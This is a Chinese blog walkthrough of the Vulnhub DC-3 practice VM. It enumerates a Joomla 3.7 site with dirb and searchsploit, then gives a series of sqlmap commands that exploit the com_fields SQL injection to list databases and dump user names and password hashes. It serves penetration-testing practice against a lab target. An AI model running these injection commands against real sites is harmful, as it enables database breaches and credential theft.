Vulnhub DC-3

Part 03

已于 2023-06-09 23:33:41 修改

阅读量264

点赞数

文章标签： p2p sql c#

于 2022-02-15 23:45:22 首次发布

本文链接：https://blog.csdn.net/qq_62260856/article/details/122806519

版权

首先明确：《中华人民共和国网络安全法 》

开始

192.168.37.132

This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge. :-)

目标 root 权限

同时

dirb http://192.168.37.132 -X .txt

版本 3.7

searchsploit joomla

/usr/share/exploitdb/exploits/php/webapps/42033.txt

复制一份到桌面打开，直接访问可能会出现卡顿

--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

192.168.37.132

sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

joomladb库

sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

爆表

sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]